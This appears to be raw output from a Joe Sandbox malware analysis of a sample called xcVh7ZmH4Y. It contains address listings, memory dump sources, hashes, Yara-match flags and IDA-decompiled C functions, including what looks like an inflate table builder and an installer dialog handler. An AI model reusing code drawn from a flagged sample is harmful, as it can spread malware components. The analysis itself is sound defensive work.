                                                                                      0x00407086
                                                                                      0x00407089
                                                                                      0x0040708b
                                                                                      0x00407099
                                                                                      0x00407099
                                                                                      0x0040709c
                                                                                      0x0040709c
                                                                                      0x0040709f
                                                                                      0x004070a2
                                                                                      0x004070a5
                                                                                      0x004070a8
                                                                                      0x004070ab
                                                                                      0x004070ae
                                                                                      0x00000000
                                                                                      0x004070ae
                                                                                      0x0040708d
                                                                                      0x0040708d
                                                                                      0x00407093
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407093
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407432
                                                                                      0x00407432
                                                                                      0x00407438
                                                                                      0x0040743e
                                                                                      0x00407443
                                                                                      0x00407449
                                                                                      0x0040744f
                                                                                      0x00407451
                                                                                      0x00407454
                                                                                      0x0040745d
                                                                                      0x00407463
                                                                                      0x00407463
                                                                                      0x00407456
                                                                                      0x00407458
                                                                                      0x0040745a
                                                                                      0x0040745a
                                                                                      0x00407465
                                                                                      0x00407467
                                                                                      0x0040746a
                                                                                      0x004074a5
                                                                                      0x004074a5
                                                                                      0x00000000
                                                                                      0x0040746c
                                                                                      0x0040746c
                                                                                      0x0040746c
                                                                                      0x00407472
                                                                                      0x00407475
                                                                                      0x00407477
                                                                                      0x004074ac
                                                                                      0x004074ae
                                                                                      0x00000000
                                                                                      0x004074ae
                                                                                      0x00000000
                                                                                      0x00407477
                                                                                      0x00000000
                                                                                      0x00406ab6
                                                                                      0x00407484
                                                                                      0x00000000
                                                                                      0x00407484
                                                                                      0x00406e98
                                                                                      0x00406e9a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e9c
                                                                                      0x00406e9c
                                                                                      0x00406e9f
                                                                                      0x00000000
                                                                                      0x00406e9f
                                                                                      0x00406de4
                                                                                      0x00406da5
                                                                                      0x00407489
                                                                                      0x0040748c
                                                                                      0x0040748e
                                                                                      0x00407497
                                                                                      0x0040749d
                                                                                      0x00000000

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                      • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                                                      • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                      • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                      				signed int _v8;
                                                                                      				unsigned int _v12;
                                                                                      				signed int _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				intOrPtr* _v32;
                                                                                      				signed int* _v36;
                                                                                      				signed int _v40;
                                                                                      				signed int _v44;
                                                                                      				intOrPtr _v48;
                                                                                      				intOrPtr _v52;
                                                                                      				void _v116;
                                                                                      				signed int _v176;
                                                                                      				signed int _v180;
                                                                                      				signed int _v240;
                                                                                      				signed int _t166;
                                                                                      				signed int _t168;
                                                                                      				intOrPtr _t175;
                                                                                      				signed int _t181;
                                                                                      				void* _t182;
                                                                                      				intOrPtr _t183;
                                                                                      				signed int* _t184;
                                                                                      				signed int _t186;
                                                                                      				signed int _t187;
                                                                                      				signed int* _t189;
                                                                                      				signed int _t190;
                                                                                      				intOrPtr* _t191;
                                                                                      				intOrPtr _t192;
                                                                                      				signed int _t193;
                                                                                      				signed int _t195;
                                                                                      				signed int _t200;
                                                                                      				signed int _t205;
                                                                                      				void* _t207;
                                                                                      				short _t208;
                                                                                      				signed char _t222;
                                                                                      				signed int _t224;
                                                                                      				signed int _t225;
                                                                                      				signed int* _t232;
                                                                                      				signed int _t233;
                                                                                      				signed int _t234;
                                                                                      				void* _t235;
                                                                                      				signed int _t236;
                                                                                      				signed int _t244;
                                                                                      				signed int _t246;
                                                                                      				signed int _t251;
                                                                                      				signed int _t254;
                                                                                      				signed int _t256;
                                                                                      				signed int _t259;
                                                                                      				signed int _t262;
                                                                                      				void* _t263;
                                                                                      				void* _t264;
                                                                                      				signed int _t267;
                                                                                      				intOrPtr _t269;
                                                                                      				intOrPtr _t271;
                                                                                      				signed int _t274;
                                                                                      				intOrPtr* _t275;
                                                                                      				unsigned int _t276;
                                                                                      				void* _t277;
                                                                                      				signed int _t278;
                                                                                      				intOrPtr* _t279;
                                                                                      				signed int _t281;
                                                                                      				intOrPtr _t282;
                                                                                      				intOrPtr _t283;
                                                                                      				signed int* _t284;
                                                                                      				signed int _t286;
                                                                                      				signed int _t287;
                                                                                      				signed int _t288;
                                                                                      				signed int _t296;
                                                                                      				signed int* _t297;
                                                                                      				intOrPtr _t298;
                                                                                      				void* _t299;
                                                                                      
                                                                                      				_t278 = _a8;
                                                                                      				_t187 = 0x10;
                                                                                      				memset( &_v116, 0, _t187 << 2);
                                                                                      				_t189 = _a4;
                                                                                      				_t233 = _t278;
                                                                                      				do {
                                                                                      					_t166 =  *_t189;
                                                                                      					_t189 =  &(_t189[1]);
                                                                                      					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                      					_t233 = _t233 - 1;
                                                                                      				} while (_t233 != 0);
                                                                                      				if(_v116 != _t278) {
                                                                                      					_t279 = _a28;
                                                                                      					_t267 =  *_t279;
                                                                                      					_t190 = 1;
                                                                                      					_a28 = _t267;
                                                                                      					_t234 = 0xf;
                                                                                      					while(1) {
                                                                                      						_t168 = 0;
                                                                                      						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                      							break;
                                                                                      						}
                                                                                      						_t190 = _t190 + 1;
                                                                                      						if(_t190 <= _t234) {
                                                                                      							continue;
                                                                                      						}
                                                                                      						break;
                                                                                      					}
                                                                                      					_v8 = _t190;
                                                                                      					if(_t267 < _t190) {
                                                                                      						_a28 = _t190;
                                                                                      					}
                                                                                      					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                      						_t234 = _t234 - 1;
                                                                                      						if(_t234 != 0) {
                                                                                      							continue;
                                                                                      						}
                                                                                      						break;
                                                                                      					}
                                                                                      					_v28 = _t234;
                                                                                      					if(_a28 > _t234) {
                                                                                      						_a28 = _t234;
                                                                                      					}
                                                                                      					 *_t279 = _a28;
                                                                                      					_t181 = 1 << _t190;
                                                                                      					while(_t190 < _t234) {
                                                                                      						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                      						if(_t182 < 0) {
                                                                                      							L64:
                                                                                      							return _t168 | 0xffffffff;
                                                                                      						}
                                                                                      						_t190 = _t190 + 1;
                                                                                      						_t181 = _t182 + _t182;
                                                                                      					}
                                                                                      					_t281 = _t234 << 2;
                                                                                      					_t191 = _t299 + _t281 - 0x70;
                                                                                      					_t269 =  *_t191;
                                                                                      					_t183 = _t181 - _t269;
                                                                                      					_v52 = _t183;
                                                                                      					if(_t183 < 0) {
                                                                                      						goto L64;
                                                                                      					}
                                                                                      					_v176 = _t168;
                                                                                      					 *_t191 = _t269 + _t183;
                                                                                      					_t192 = 0;
                                                                                      					_t235 = _t234 - 1;
                                                                                      					if(_t235 == 0) {
                                                                                      						L21:
                                                                                      						_t184 = _a4;
                                                                                      						_t271 = 0;
                                                                                      						do {
                                                                                      							_t193 =  *_t184;
                                                                                      							_t184 =  &(_t184[1]);
                                                                                      							if(_t193 != _t168) {
                                                                                      								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                      								_t236 =  *_t232;
                                                                                      								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                                                                                      								 *_t232 = _t236 + 1;
                                                                                      							}
                                                                                      							_t271 = _t271 + 1;
                                                                                      						} while (_t271 < _a8);
                                                                                      						_v16 = _v16 | 0xffffffff;
                                                                                      						_v40 = _v40 & 0x00000000;
                                                                                      						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                      						_t195 = _v8;
                                                                                      						_t186 =  ~_a28;
                                                                                      						_v12 = _t168;
                                                                                      						_v180 = _t168;
                                                                                      						_v36 = 0x432190;
                                                                                      						_v240 = _t168;
                                                                                      						if(_t195 > _v28) {
                                                                                      							L62:
                                                                                      							_t168 = 0;
                                                                                      							if(_v52 == 0 || _v28 == 1) {
                                                                                      								return _t168;
                                                                                      							} else {
                                                                                      								goto L64;
                                                                                      							}
                                                                                      						}
                                                                                      						_v44 = _t195 - 1;
                                                                                      						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                                      						do {
                                                                                      							_t282 =  *_v32;
                                                                                      							if(_t282 == 0) {
                                                                                      								goto L61;
                                                                                      							}
                                                                                      							while(1) {
                                                                                      								_t283 = _t282 - 1;
                                                                                      								_t200 = _a28 + _t186;
                                                                                      								_v48 = _t283;
                                                                                      								_v24 = _t200;
                                                                                      								if(_v8 <= _t200) {
                                                                                      									goto L45;
                                                                                      								}
                                                                                      								L31:
                                                                                      								_v20 = _t283 + 1;
                                                                                      								do {
                                                                                      									_v16 = _v16 + 1;
                                                                                      									_t296 = _v28 - _v24;
                                                                                      									if(_t296 > _a28) {
                                                                                      										_t296 = _a28;
                                                                                      									}
                                                                                      									_t222 = _v8 - _v24;
                                                                                      									_t254 = 1 << _t222;
                                                                                      									if(1 <= _v20) {
                                                                                      										L40:
                                                                                      										_t256 =  *_a36;
                                                                                      										_t168 = 1 << _t222;
                                                                                      										_v40 = 1;
                                                                                      										_t274 = _t256 + 1;
                                                                                      										if(_t274 > 0x5a0) {
                                                                                      											goto L64;
                                                                                      										}
                                                                                      									} else {
                                                                                      										_t275 = _v32;
                                                                                      										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                      										if(_t222 >= _t296) {
                                                                                      											goto L40;
                                                                                      										}
                                                                                      										while(1) {
                                                                                      											_t222 = _t222 + 1;
                                                                                      											if(_t222 >= _t296) {
                                                                                      												goto L40;
                                                                                      											}
                                                                                      											_t275 = _t275 + 4;
                                                                                      											_t264 = _t263 + _t263;
                                                                                      											_t175 =  *_t275;
                                                                                      											if(_t264 <= _t175) {
                                                                                      												goto L40;
                                                                                      											}
                                                                                      											_t263 = _t264 - _t175;
                                                                                      										}
                                                                                      										goto L40;
                                                                                      									}
                                                                                      									_t168 = _a32 + _t256 * 4;
                                                                                      									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                      									 *_a36 = _t274;
                                                                                      									_t259 = _v16;
                                                                                      									 *_t297 = _t168;
                                                                                      									if(_t259 == 0) {
                                                                                      										 *_a24 = _t168;
                                                                                      									} else {
                                                                                      										_t276 = _v12;
                                                                                      										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                      										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                      										_a5 = _a28;
                                                                                      										_a4 = _t222;
                                                                                      										_t262 = _t276 >> _t186;
                                                                                      										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                      										 *(_t298 + _t262 * 4) = _a4;
                                                                                      									}
                                                                                      									_t224 = _v24;
                                                                                      									_t186 = _t224;
                                                                                      									_t225 = _t224 + _a28;
                                                                                      									_v24 = _t225;
                                                                                      								} while (_v8 > _t225);
                                                                                      								L45:
                                                                                      								_t284 = _v36;
                                                                                      								_a5 = _v8 - _t186;
                                                                                      								if(_t284 < 0x432190 + _a8 * 4) {
                                                                                      									_t205 =  *_t284;
                                                                                      									if(_t205 >= _a12) {
                                                                                      										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                      										_v36 =  &(_v36[1]);
                                                                                      										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                      										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                      									} else {
                                                                                      										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                      										_t208 =  *_t284;
                                                                                      										_v36 =  &(_t284[1]);
                                                                                      									}
                                                                                      									_a6 = _t208;
                                                                                      								} else {
                                                                                      									_a4 = 0xc0;
                                                                                      								}
                                                                                      								_t286 = 1 << _v8 - _t186;
                                                                                      								_t244 = _v12 >> _t186;
                                                                                      								while(_t244 < _v40) {
                                                                                      									 *(_t168 + _t244 * 4) = _a4;
                                                                                      									_t244 = _t244 + _t286;
                                                                                      								}
                                                                                      								_t287 = _v12;
                                                                                      								_t246 = 1 << _v44;
                                                                                      								while((_t287 & _t246) != 0) {
                                                                                      									_t287 = _t287 ^ _t246;
                                                                                      									_t246 = _t246 >> 1;
                                                                                      								}
                                                                                      								_t288 = _t287 ^ _t246;
                                                                                      								_v20 = 1;
                                                                                      								_v12 = _t288;
                                                                                      								_t251 = _v16;
                                                                                      								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                      									L60:
                                                                                      									if(_v48 != 0) {
                                                                                      										_t282 = _v48;
                                                                                      										_t283 = _t282 - 1;
                                                                                      										_t200 = _a28 + _t186;
                                                                                      										_v48 = _t283;
                                                                                      										_v24 = _t200;
                                                                                      										if(_v8 <= _t200) {
                                                                                      											goto L45;
                                                                                      										}
                                                                                      										goto L31;
                                                                                      									}
                                                                                      									break;
                                                                                      								} else {
                                                                                      									goto L58;
                                                                                      								}
                                                                                      								do {
                                                                                      									L58:
                                                                                      									_t186 = _t186 - _a28;
                                                                                      									_t251 = _t251 - 1;
                                                                                      								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                      								_v16 = _t251;
                                                                                      								goto L60;
                                                                                      							}
                                                                                      							L61:
                                                                                      							_v8 = _v8 + 1;
                                                                                      							_v32 = _v32 + 4;
                                                                                      							_v44 = _v44 + 1;
                                                                                      						} while (_v8 <= _v28);
                                                                                      						goto L62;
                                                                                      					}
                                                                                      					_t277 = 0;
                                                                                      					do {
                                                                                      						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                      						_t277 = _t277 + 4;
                                                                                      						_t235 = _t235 - 1;
                                                                                      						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                      					} while (_t235 != 0);
                                                                                      					goto L21;
                                                                                      				}
                                                                                      				 *_a24 =  *_a24 & 0x00000000;
                                                                                      				 *_a28 =  *_a28 & 0x00000000;
                                                                                      				return 0;
                                                                                      			}











































































                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407885
                                                                                      0x00407694
                                                                                      0x00407697
                                                                                      0x0040769a
                                                                                      0x0040769d
                                                                                      0x004076a1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004076ac
                                                                                      0x004076af
                                                                                      0x004076b0
                                                                                      0x004076b2
                                                                                      0x004076b8
                                                                                      0x004076bb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004076c1
                                                                                      0x004076c2
                                                                                      0x004076c5
                                                                                      0x004076c8
                                                                                      0x004076cb
                                                                                      0x004076d1
                                                                                      0x004076d3
                                                                                      0x004076d3
                                                                                      0x004076db
                                                                                      0x004076df
                                                                                      0x004076e4
                                                                                      0x00407709
                                                                                      0x0040770f
                                                                                      0x00407711
                                                                                      0x00407713
                                                                                      0x00407716
                                                                                      0x0040771f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004076e6
                                                                                      0x004076e6
                                                                                      0x004076ef
                                                                                      0x004076f3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407704
                                                                                      0x00407704
                                                                                      0x00407707
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004076f7
                                                                                      0x004076fa
                                                                                      0x004076fc
                                                                                      0x00407700
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407702
                                                                                      0x00407702
                                                                                      0x00000000
                                                                                      0x00407704
                                                                                      0x00407728
                                                                                      0x0040772e
                                                                                      0x00407738
                                                                                      0x0040773a
                                                                                      0x0040773f
                                                                                      0x00407741
                                                                                      0x00407777
                                                                                      0x00407743
                                                                                      0x00407743
                                                                                      0x00407746
                                                                                      0x00407749
                                                                                      0x00407753
                                                                                      0x00407756
                                                                                      0x0040775d
                                                                                      0x00407768
                                                                                      0x0040776f
                                                                                      0x0040776f
                                                                                      0x00407779
                                                                                      0x0040777c
                                                                                      0x0040777e
                                                                                      0x00407784
                                                                                      0x00407784
                                                                                      0x0040778d
                                                                                      0x00407790
                                                                                      0x00407795
                                                                                      0x004077a4
                                                                                      0x004077ac
                                                                                      0x004077b1
                                                                                      0x004077d5
                                                                                      0x004077dd
                                                                                      0x004077e1
                                                                                      0x004077e7
                                                                                      0x004077b3
                                                                                      0x004077c1
                                                                                      0x004077c4
                                                                                      0x004077ca
                                                                                      0x004077ca
                                                                                      0x004077eb
                                                                                      0x004077a6
                                                                                      0x004077a6
                                                                                      0x004077a6
                                                                                      0x004077fc
                                                                                      0x00407800
                                                                                      0x0040780c
                                                                                      0x00407807
                                                                                      0x0040780a
                                                                                      0x0040780a
                                                                                      0x00407814
                                                                                      0x00407819
                                                                                      0x00407821
                                                                                      0x0040781d
                                                                                      0x0040781f
                                                                                      0x0040781f
                                                                                      0x00407827
                                                                                      0x00407829
                                                                                      0x00407830
                                                                                      0x0040783a
                                                                                      0x00407844
                                                                                      0x00407860
                                                                                      0x00407864
                                                                                      0x004076a9
                                                                                      0x004076af
                                                                                      0x004076b0
                                                                                      0x004076b2
                                                                                      0x004076b8
                                                                                      0x004076bb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004076bb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407846
                                                                                      0x00407846
                                                                                      0x00407846
                                                                                      0x0040784b
                                                                                      0x00407854
                                                                                      0x0040785d
                                                                                      0x00000000
                                                                                      0x0040785d
                                                                                      0x0040786a
                                                                                      0x0040786a
                                                                                      0x0040786d
                                                                                      0x00407874
                                                                                      0x00407877
                                                                                      0x00000000
                                                                                      0x0040769a
                                                                                      0x0040761a
                                                                                      0x0040761c
                                                                                      0x0040761c
                                                                                      0x00407620
                                                                                      0x00407623
                                                                                      0x00407624
                                                                                      0x00407624
                                                                                      0x00000000
                                                                                      0x0040761c
                                                                                      0x00407590
                                                                                      0x00407596
                                                                                      0x00000000

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                      • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                                                      • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                      • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5ee9e833f7817d63086b7651fea46584802ae61c763bec8477c2ac69c5a212ec
                                                                                      • Instruction ID: b9dfa368171fa33a4e9660a359b9c5bc11bba99731c09352cd3aa097366dd528
                                                                                      • Opcode Fuzzy Hash: 5ee9e833f7817d63086b7651fea46584802ae61c763bec8477c2ac69c5a212ec
                                                                                      • Instruction Fuzzy Hash: 81A12475A082099FCB389E34C8A57EF7BE2AF95394F50451EDD8AD7254C7708A81CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 498728252e7fb5574d1099f7aa5c8c6f0c417ebad937eafb12205c475d099e87
                                                                                      • Instruction ID: 3c252c0bfcb5f104930790b18d0ebf643b326607a3176b4c9cf2a92ddc4cedfa
                                                                                      • Opcode Fuzzy Hash: 498728252e7fb5574d1099f7aa5c8c6f0c417ebad937eafb12205c475d099e87
                                                                                      • Instruction Fuzzy Hash: 38A15A72A003A6DFDB308E38CD947DB77B2AF45790F94412ECE5A8B645E7305A85CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4ac47eda242a5cdbbd1d91a4f37f86c8877eab3c1c88d8d2c2b89bd28e47fdec
                                                                                      • Instruction ID: 017b710e74ab8cf027c346f51907ee446e563afb50f128cfbfda708faa443aba
                                                                                      • Opcode Fuzzy Hash: 4ac47eda242a5cdbbd1d91a4f37f86c8877eab3c1c88d8d2c2b89bd28e47fdec
                                                                                      • Instruction Fuzzy Hash: 17914636A04245DFDB349E74D8A97EB77A2FF94394F50462EDC8AD7244C7318681CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac7e6f5f3fbf8a73bd45c146f5fb27408af3ca375643ad90ed52c7c4249e2418
                                                                                      • Instruction ID: 349f533f29d27bd032d72560d0496afebceb8977ccda8cd7fc0229fd4adea396
                                                                                      • Opcode Fuzzy Hash: ac7e6f5f3fbf8a73bd45c146f5fb27408af3ca375643ad90ed52c7c4249e2418
                                                                                      • Instruction Fuzzy Hash: 22812576608345DFDB389E74D8A97EE77A2EF94394F50062EDC8AD7244C7318681CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      C-Code - Quality: 96%
                                                                                      			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                      				struct HWND__* _v8;
                                                                                      				struct HWND__* _v12;
                                                                                      				long _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				signed char* _v32;
                                                                                      				int _v36;
                                                                                      				signed int _v44;
                                                                                      				int _v48;
                                                                                      				signed int* _v60;
                                                                                      				signed char* _v64;
                                                                                      				signed int _v68;
                                                                                      				long _v72;
                                                                                      				void* _v76;
                                                                                      				intOrPtr _v80;
                                                                                      				intOrPtr _v84;
                                                                                      				void* _v88;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t198;
                                                                                      				intOrPtr _t201;
                                                                                      				long _t207;
                                                                                      				signed int _t211;
                                                                                      				signed int _t222;
                                                                                      				void* _t225;
                                                                                      				void* _t226;
                                                                                      				int _t232;
                                                                                      				long _t237;
                                                                                      				long _t238;
                                                                                      				signed int _t239;
                                                                                      				signed int _t245;
                                                                                      				signed int _t247;
                                                                                      				signed char _t248;
                                                                                      				signed char _t254;
                                                                                      				void* _t258;
                                                                                      				void* _t260;
                                                                                      				signed char* _t278;
                                                                                      				signed char _t279;
                                                                                      				long _t284;
                                                                                      				struct HWND__* _t291;
                                                                                      				signed int* _t292;
                                                                                      				int _t293;
                                                                                      				long _t294;
                                                                                      				signed int _t295;
                                                                                      				void* _t297;
                                                                                      				long _t298;
                                                                                      				int _t299;
                                                                                      				signed int _t300;
                                                                                      				signed int _t303;
                                                                                      				signed int _t311;
                                                                                      				signed char* _t319;
                                                                                      				int _t324;
                                                                                      				void* _t326;
                                                                                      
                                                                                      				_t291 = _a4;
                                                                                      				_v12 = GetDlgItem(_t291, 0x3f9);
                                                                                      				_v8 = GetDlgItem(_t291, 0x408);
                                                                                      				_t326 = SendMessageW;
                                                                                      				_v24 =  *0x434f28;
                                                                                      				_v28 =  *0x434f10 + 0x94;
                                                                                      				if(_a8 != 0x110) {
                                                                                      					L23:
                                                                                      					if(_a8 != 0x405) {
                                                                                      						_t301 = _a16;
                                                                                      					} else {
                                                                                      						_a12 = 0;
                                                                                      						_t301 = 1;
                                                                                      						_a8 = 0x40f;
                                                                                      						_a16 = 1;
                                                                                      					}
                                                                                      					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                      						_v16 = _t301;
                                                                                      						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                                                      							if(( *0x434f19 & 0x00000002) != 0) {
                                                                                      								L41:
                                                                                      								if(_v16 != 0) {
                                                                                      									_t237 = _v16;
                                                                                      									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                                                      										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                                                      									}
                                                                                      									_t238 = _v16;
                                                                                      									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                                                      										_t301 = _v24;
                                                                                      										_t239 =  *(_t238 + 0x5c);
